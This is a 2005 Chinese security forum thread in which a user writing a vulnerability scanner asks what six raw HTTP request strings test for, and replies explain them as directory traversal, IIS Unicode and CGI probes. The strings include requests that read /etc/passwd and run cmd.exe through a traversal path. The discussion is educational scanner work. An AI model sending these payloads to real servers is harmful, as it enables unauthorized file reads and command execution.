|
![]() | 作者: tosy [tosy0070]
![]() |
登录 |
ex[1]="GET /../../../../etc/passwd HTTP/1.0\n\n"; ex[2]="GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0\n\n"; ex[3]="GET /A.ida/%c1%00.ida HTTP/1.0\n\n"; ex[4]="GET /cgi-bin/pfdispaly.cgi?/../../../../etc/motd HTTP/1.0\n\n"; ex[5]="GET /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd HTTP/1.0\n\n"; ex[6]="GET /cgi-bin/test-cgi?* HTTP/1.0\n\n"; 本人在做漏洞扫描程序的时候,在资料中看到上面的6组向WEB服务器发送的数据,请问哪位高手能解释下,上面的各组数据具体是检测什么漏洞的,为什么,先谢谢各位的支持了 |
地主 发表时间: 05-05-23 14:12 |
![]() | 回复: 286 [unique] ![]() |
登录 |
第一个可能是针对某个具体系统的,应该不是windows系列。 第二个是测IIS中,scripts是否有可执行的权力。 第三个,同第二个。 第四五六是测CGI网关的漏洞。也不是针对windows操作系统的。 真正实用的是第二个和第三个。但这两个要求对方没打补丁,版本很低。并且管理员是弱智。 |
B1层 发表时间: 05-05-23 15:48 |
![]() | 回复: wxngzybb [wxngzybb] ![]() |
登录 |
严格的说这些并不是http协议本身的漏洞,unicode漏洞是个系统漏洞 ../走到上层目录,当浏览器地址栏禁止用/就用它的unicode码 script目录在iis里是有可执行程序权限的目录,在他的目录下可以寻址并执行程序 win2000 iis 5.0 NT 4.0 iis 4.0打sp1 patch就完结了。也就是说这个漏洞已经没什么价值了 |
B2层 发表时间: 05-05-23 19:53 |
![]() | 回复: NetDemon [netdemon] ![]() |
登录 |
这些个漏洞(特别是UNIX的)存在于主流CPU为586的时候,现在呢,基本上是不存在的, 就象你现在除了在20CN,很难找到'286'一样 ![]() |
B3层 发表时间: 05-05-23 21:09 |
![]() | 回复: 286 [unique] ![]() |
登录 |
![]() ![]() ![]() ![]() ![]() ![]() 说来说去还是嫌我老 |
B4层 发表时间: 05-05-24 09:02 |
![]() | 回复: tosy [tosy0070] ![]() |
登录 |
谢谢各位的帮助!请问各位能否提供一些CGI漏洞扫描的资料呢 |
B5层 发表时间: 05-05-24 14:06 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号